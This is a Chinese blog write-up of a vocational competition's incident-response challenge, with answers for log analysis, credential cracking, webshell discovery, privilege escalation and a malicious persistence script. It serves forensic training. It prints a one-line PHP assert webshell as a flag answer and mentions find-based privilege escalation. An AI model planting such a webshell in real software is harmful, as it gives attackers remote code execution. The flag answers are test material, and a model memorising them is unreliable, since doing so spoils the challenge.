某省职业院校技能大赛 高职组“信息安全管理与评估”赛项第二部分:应急响应

发布于:2025-06-30 ⋅ 阅读:(17) ⋅ 点赞:(0)

!!!需要环境可私信博主!!!

!!!若有错误欢迎指正!:)

序号 任务要求
1 提交攻击者的两个内网IP地址
2 提交网站管理员用户的用户名和密码
3 提交黑客得到 mysql 服务的 root 账号密码的时间
4 查找黑客在WEB应用中写入的恶意代码,提交文件绝对路径
5 查找黑客在WEB应用中写入的恶意代码,提交最简单的形式

(格式:<?php xxxx?>)

6 分析攻击者的提权手法,提交攻击者通过哪一个指令成功提权
7 服务器内与动态恶意程序相关的三个文件绝对路径
8 恶意程序对外连接的目的IP地址

目录

1、提交攻击者的两个内网IP地址

2、提交网站管理员用户的用户名和密码

3、提交黑客得到mysql服务的root账号密码的时间

4、查找黑客在WEB应用中写入的恶意代码,提交文件绝对路径

5、查找黑客在WEB应用中写入的恶意代码,提交最简单的形式(格式: )

6、分析攻击者的提权手法,提交攻击者通过哪一个指令成功提权

7、服务器内与动态恶意程序相关的三个文件绝对路径

8、恶意程序对外连接的目的IP地址


1、提交攻击者的两个内网IP地址

筛选出日志中出现的IP地址并进行排序

cat access_log* | awk '{print $1}' | sort | uniq -c | sort -nr

这里我查看了几个IP的流量最终发现 192.168.21.1 和192.168.21.137 存在攻击行为

flag{192.168.21.1,192.168.21.137}

2、提交网站管理员用户的用户名和密码

在本地网站文件中,全局搜素查看存放数据库账号密码的文件

grep -rE "username|password|databases" ../

发现一个 settings.php 文件内容似乎与数据库相关,查看内容找到了数据库的账号和密码

使用账号密码登录到本地数据库中,注意这里需要加上 127.0.0.1 才可以连接到数据库中

查库查表最后菜 users 表中发现 admin 的账户和加密的密码

将密码 copy 出来,使用 john 工具进行破解,最后得到密码为 1111

flag{admin:1111}

3、提交黑客得到mysql服务的root账号密码的时间

继续审计日志文件,可以发现攻击者有几条日志的内容进行了base64加密

解码base64内容,发现黑客正在读取服务器数据库的账号密码信息,所以确定时间为:30/Jun/2020:04:09:12

flag{30/Jun/2020:04:09:12}

4、查找黑客在WEB应用中写入的恶意代码,提交文件绝对路径

查看日志的时候发现这样的一大段可疑流量

丢入Cyber进行解码后发现是使用取反 ~ 运算的变形webshell,所以确定该文件是黑客写入的恶意代码

详细可了解:不包含数字字母的WebShell - FreeBuf网络安全行业门户

查找一下文件存储的位置

flag{/var/www/html/cron.php}

5、查找黑客在WEB应用中写入的恶意代码,提交最简单的形式(格式:<?php xxxx?>)

最终的格式为 assert($_POST[_]);

flag{<?php assert($_POST[_]); ?>}

6、分析攻击者的提权手法,提交攻击者通过哪一个指令成功提权

分析这条日志内容可以发现攻击者利用的是 find 提权

7、服务器内与动态恶意程序相关的三个文件绝对路径

使用 pstree 查看系统运行的程序

发现 sshd 进程下直接生成了一个 sleep 命令不同寻常,查看 sshd 文件

其中有一个永真的循环脚本,来消耗网络资源,再有 ssh 来调用

所以这里与动态恶意程序相关的三个文件绝对路径为:/etc/ssh/sshd,/bin/sshd,/usr/lib/systemd/system/ssh.service

flag{/etc/ssh/sshd,/bin/sshd,/usr/lib/systemd/system/ssh.service}

8、恶意程序对外连接的目的IP地址

使用 netstat 命令查看网络端口状态

flag{47.113.101.105}


网站公告

今日签到

点亮在社区的每一天
去签到